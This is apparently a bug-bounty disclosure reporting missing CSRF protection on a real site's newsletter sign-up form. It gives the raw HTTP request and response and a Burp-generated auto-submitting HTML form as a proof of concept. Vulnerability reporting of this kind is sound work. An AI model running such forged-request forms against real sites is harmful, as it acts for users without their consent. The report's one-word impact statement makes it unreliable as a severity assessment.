CSRF in newsletter form

Hi, i can perform csrf attack on victim on newsletter to receive updates because you dont have csrf protection "csrf token" in request Request: POST / HTTP/2 Host: sifchain.finance User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 123 Upgrade-Insecure-Requests: 1 Te: trailers Connection: close EMAIL=gdfgdfg%40dsg.com&_mc4wp_honeypot=&_mc4wp_timestamp=1620658126&_mc4wp_form_id=204&_mc4wp_form_element_id=mc4wp-form-1 Response: HTTP/2 200 OK Date: Mon, 10 May 2021 14:52:32 GMT Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept-Encoding X-Hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. Host-Header: WordPress.com Link: <https://sifchain.finance/wp-json/>; rel="https://api.w.org/" Link: <https://sifchain.finance/wp-json/wp/v2/pages/2682>; rel="alternate"; type="application/json" Link: <https://wp.me/Pcru4n-Hg>; rel=shortlink X-Ac: 3.mxp _atomic_ams Cf-Cache-Status: DYNAMIC Cf-Request-Id: 09f85d032c0000374433a18000000001 Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare Cf-Ray: 64d3fde509573744-MXP <!DOCTYPE html> <html lang="en-US" class=""> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://sifchain.finance/xmlrpc.php"> [Snipped parts] <div class="mc4wp-response"><div class="mc4wp-alert mc4wp-success" role="alert"><p>Thank you, your sign-up request was successful! Please check your email inbox to confirm.</p></div> PoC: <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://sifchain.finance/" method="POST"> <input type="hidden" name="EMAIL" value="any&#64;anyy&#46;com" /> <input type="hidden" name="&#95;mc4wp&#95;honeypot" value="" /> <input type="hidden" name="&#95;mc4wp&#95;timestamp" value="1620658126" /> <input type="hidden" name="&#95;mc4wp&#95;form&#95;id" value="204" /> <input type="hidden" name="&#95;mc4wp&#95;form&#95;element&#95;id" value="mc4wp&#45;form&#45;1" /> <input type="submit" value="Submit request" /> </form> </body> </html> 1. save as .html file 2. open in browser chrome or firefox and as you can see "Thank you, your sign-up request was successful! Please check your email inbox to confirm" Cheers, Ph0b0s ## Impact CSRF